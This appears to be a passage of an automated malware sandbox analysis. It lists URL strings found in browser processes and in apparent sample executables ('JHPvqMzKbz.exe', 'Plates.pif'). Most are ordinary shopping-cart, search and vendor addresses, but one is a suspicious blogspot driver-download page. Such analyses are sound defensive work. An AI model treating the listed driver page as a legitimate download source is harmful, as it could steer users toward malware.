Source: chrome.exe, 0000002C.00000002.172376198228.00000C6400C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377176817.00000C6400DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172376929627.00000C6400D6C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172475474020.00007B1C00710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002C.00000002.172371045661.00000C64003C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/cart/
Source: chrome.exe, 0000002C.00000002.172379174463.00000C6401174000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172376725260.00000C6400CFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377557852.00000C6400E5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
Source: msedge.exe, 0000001B.00000002.169653431224.000053D000454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172366446199.00000C6000070000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172476178727.00007B1C004EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172471137526.00007B1C004EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172536566096.00007B1C004EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172535173785.00007B1C004EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172478894965.00007B1C004EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172805827120.00007B1C004EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172472119076.00007B1C004EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: msedge.exe, 0000001B.00000002.169653431224.000053D000454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172476178727.00007B1C004EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172471137526.00007B1C004EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172536566096.00007B1C004EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172535173785.00007B1C004EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172478894965.00007B1C004EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172805827120.00007B1C004EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172472119076.00007B1C004EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: chrome.exe, 0000002C.00000002.172377475928.00000C6400E20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000017.00000003.169479433883.00000D740124C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169479337904.00000D740196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172383543045.00000C6401640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380455425.00000C64012D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374714954.00000C6400A98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tpc.googlesyndication.com/sodar/Enqz_20U.html
Source: chrome.exe, 00000017.00000003.169483014536.00000D7400A80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379060964.00000C640114C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272815679.00000C640114C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172372999161.00000C6400854000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172273182443.00000C640114C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tr.snapchat.com/cm/i
Source: chrome.exe, 00000017.00000003.169483014536.00000D7400A80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172372999161.00000C6400854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tr.snapchat.com/cm/i?pid=93f19646-2418-418d-98af-f244ebb7c1cc
Source: chrome.exe, 0000002C.00000002.172374970740.00000C6400AC0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172475474020.00007B1C00710000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172814089762.00007B1C00E1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/favicon.ico
Source: chrome.exe, 0000002C.00000002.172379307959.00000C64011A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172490986682.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172480287392.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172502216900.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172809076418.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172483113629.00007B1C0086C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172484310746.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172479678787.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/search
Source: chrome.exe, 0000002C.00000002.172379307959.00000C64011A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172490986682.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172480287392.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172502216900.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172809076418.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172483113629.00007B1C0086C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172484310746.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172479678787.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 0000002C.00000002.172379307959.00000C64011A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172490986682.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172480287392.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172502216900.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172809076418.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172483113629.00007B1C0086C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172484310746.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172479678787.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: chrome.exe, 0000002C.00000002.172379241276.00000C6401188000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172507854924.00007B1C006D0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172519214870.00007B1C006CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172500833650.00007B1C006D0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172536907534.00007B1C006CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172807538622.00007B1C006D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msedge.exe, 0000001B.00000002.169647724538.0000017282B8C000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000001B.00000002.169648180033.0000017282BDB000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000001B.00000003.169642819944.0000017282BD9000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000001B.00000003.169642901211.0000017282BDA000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172788664313.00000123A90FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://unitedstates1.ss.wd.microsoft.us
Source: msedge.exe, 0000001B.00000002.169648453170.00000172890CE000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172788664313.00000123A90FB000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172786391666.00000123A65D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://unitedstates2.ss.wd.microsoft.us
Source: msedge.exe, 0000001B.00000002.169648180033.0000017282BDB000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000001B.00000003.169642819944.0000017282BD9000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000001B.00000003.169642901211.0000017282BDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://unitedstates2.ss.wd.microsoft.usPr
Source: msedge.exe, 0000001B.00000002.169648453170.00000172890CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://unitedstates2.ss.wd.microsoft.usS:AI(RA;IOOICI;;;;WD;(
Source: msedge.exe, 0000001B.00000002.169648180033.0000017282BDB000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000001B.00000003.169642819944.0000017282BD9000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000001B.00000003.169642901211.0000017282BDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://unitedstates4.ss.wd.microsoft.usdge
Source: chrome.exe, 0000002C.00000002.172379429602.00000C64011D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://windows-drivers-x04.blogspot.com
Source: chrome.exe, 0000002C.00000002.172380225929.00000C640128C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://windows-drivers-x04.blogspot.com/
Source: chrome.exe, 0000002C.00000002.172379429602.00000C64011D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172372999161.00000C6400854000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374513342.00000C6400A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://windows-drivers-x04.blogspot.com/2013/06/bios320exe-64-bit-download.html
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.academy.com/shop/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.acehardware.com/cart
Source: chrome.exe, 0000002C.00000002.172374066758.00000C64009A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.adorama.com/als.mvc/cartview
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ae.com/us/en/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.altardstate.com/cart/
Source: chrome.exe, 0000002C.00000002.172374066758.00000C64009A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/gp/cart/view.html
Source: chrome.exe, 0000002C.00000002.172374066758.00000C64009A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/gp/cart/view.html
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.anthropologie.com/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.apple.com/shop/bag
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.atlassian.com/purchase/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.att.com/buy/cart
Source: chrome.exe, 00000017.00000003.169479433883.00000D740124C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169479337904.00000D740196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169451513999.00000D7400A80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172383543045.00000C6401640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272281153.00000C6400A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380455425.00000C64012D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374714954.00000C6400A98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com
Source: chrome.exe, 00000017.00000003.169479433883.00000D740124C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169479337904.00000D740196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169451513999.00000D7400A80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172383543045.00000C6401640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272281153.00000C6400A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380455425.00000C64012D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380225929.00000C640128C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374714954.00000C6400A98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/
Source: JHPvqMzKbz.exe, 00000000.00000003.168178958911.0000000002B56000.00000004.00000020.00020000.00000000.sdmp, Plates.pif, 0000000B.00000003.168223388127.00000000044F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: chrome.exe, 0000002C.00000002.172385547749.00000C6401978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379748982.00000C6401220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172382836385.00000C6401584000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297299914.00000C6400374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
Source: chrome.exe, 0000002C.00000003.172297299914.00000C6400374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370776333.00000C6400376000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exeB
Source: chrome.exe, 0000002C.00000002.172385547749.00000C6401978000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exeime
Source: chrome.exe, 0000002C.00000002.172382836385.00000C6401584000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297299914.00000C6400374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370776333.00000C6400376000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exe
Source: chrome.exe, 0000002C.00000003.172297299914.00000C6400374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370776333.00000C6400376000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeP
Source: chrome.exe, 00000017.00000003.169479433883.00000D740124C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169479337904.00000D740196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169451513999.00000D7400A80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172383543045.00000C6401640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272281153.00000C6400A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380455425.00000C64012D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374714954.00000C6400A98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/
Source: chrome.exe, 0000002C.00000002.172380455425.00000C64012D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172384289955.00000C6401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370776333.00000C6400376000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374714954.00000C6400A98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/
Source: chrome.exe, 0000002C.00000003.172297299914.00000C6400374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370776333.00000C6400376000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/0
Source: chrome.exe, 0000002C.00000003.172297299914.00000C6400374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370776333.00000C6400376000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/09P4
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
Source: chrome.exe, 00000017.00000003.169479433883.00000D740124C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172383543045.00000C6401640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380455425.00000C64012D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/v
Source: chrome.exe, 0000002C.00000002.172374066758.00000C64009A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.backcountry.com/Store/cart/cart.jsp
Source: chrome.exe, 0000002C.00000002.172374066758.00000C64009A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.basspro.com/shop/AjaxOrderItemDisplayView
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bathandbodyworks.com/cart
Source: chrome.exe, 0000002C.00000002.172374066758.00000C64009A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bedbathandbeyond.com/store/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.belk.com/shopping-bag/
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/cart
Source: chrome.exe, 0000002C.00000002.172374066758.00000C64009A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bhphotovideo.com/find/cart.jsp
Source: chrome.exe, 0000002C.00000002.172379429602.00000C64011D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.blogger.com/comment-iframe.do
Source: chrome.exe, 0000002C.00000002.172379429602.00000C64011D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=58216995782927489&postID=5453638059923624242&blogspo
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bloomingdales.com/my-bag
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.boostmobile.com/cart.html
Source: chrome.exe, 0000002C.00000002.172374066758.00000C64009A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bricklink.com/v2/globalcart.page
Source: chrome.exe, 0000002C.00000002.172374066758.00000C64009A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.brownells.com/aspx/store/cart.aspx
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.buybuybaby.com/store/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.carid.com/cart.php
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.chegg.com/shoppingcart
Source: chrome.exe, 0000002C.00000002.172374066758.00000C64009A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.containerstore.com/cart/list.htm
Source: chrome.exe, 0000002C.00000002.172374066758.00000C64009A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.costco.com/CheckoutCartDisplayView
Source: chrome.exe, 0000002C.00000002.172374066758.00000C64009A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.crateandbarrel.com/Checkout/Cart
Source: chrome.exe, 0000002C.00000002.172374066758.00000C64009A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dickssportinggoods.com/OrderItemDisplay
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dsw.com/en/us/shopping-bag
Source: chrome.exe, 0000002C.00000002.172374970740.00000C6400AC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 0000002C.00000002.172379642803.00000C6401204000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 0000002C.00000002.172379642803.00000C6401204000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 0000002C.00000002.172379642803.00000C6401204000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 0000002C.00000002.172377873645.00000C6400EA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370661494.00000C6400340000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org
Source: chrome.exe, 0000002C.00000002.172377873645.00000C6400EA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370661494.00000C6400340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379748982.00000C6401220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380580647.00000C6401304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380225929.00000C640128C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/
Source: chrome.exe, 0000002C.00000002.172377873645.00000C6400EA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379748982.00000C6401220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172382193508.00000C64014CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379642803.00000C6401204000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
Source: chrome.exe, 0000002C.00000002.172372314713.00000C6400728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172279996265.00000C6400720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272029471.00000C6400724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172280226855.00000C6400724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172277467418.00000C6400724000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org:443
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.electronicexpress.com/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.etsy.com/cart/
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eyebuydirect.com/cart
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.fingerhut.com/cart/index
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.freepeople.com/cart/
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gamestop.com/cart/
Source: Plates.pif, 0000000B.00000003.168223388127.00000000044F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297299914.00000C6400374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378595932.00000C6400FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: JHPvqMzKbz.exe, 00000000.00000003.168178958911.0000000002B56000.00000004.00000020.00020000.00000000.sdmp, Plates.pif, 0000000B.00000003.168223388127.00000000044F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/06
Source: chrome.exe, 0000002C.00000002.172371045661.00000C64003C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 0000002C.00000002.172373477637.00000C64008EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172369441720.00000C6400130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.c
Source: chrome.exe, 0000002C.00000002.172373477637.00000C64008EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.cm
Source: chrome.exe, 0000002C.00000002.172369441720.00000C6400130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.cm/searc
Source: chrome.exe, 0000002C.00000002.172371045661.00000C64003C5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379429602.00000C64011D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172376929627.00000C6400D6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377662836.00000C6400E64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272815679.00000C640115F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374714954.00000C6400A98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172273182443.00000C640114C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172369787514.00000C6400194000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172383480681.00000C6401630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 0000002C.00000002.172374307525.00000C64009F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172373783130.00000C640094C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374714954.00000C6400A98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172273182443.00000C640114C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172369787514.00000C6400194000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 0000002C.00000002.172379748982.00000C6401220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378699881.00000C6401004000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/0
Source: chrome.exe, 0000002C.00000002.172379748982.00000C6401220000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/0B
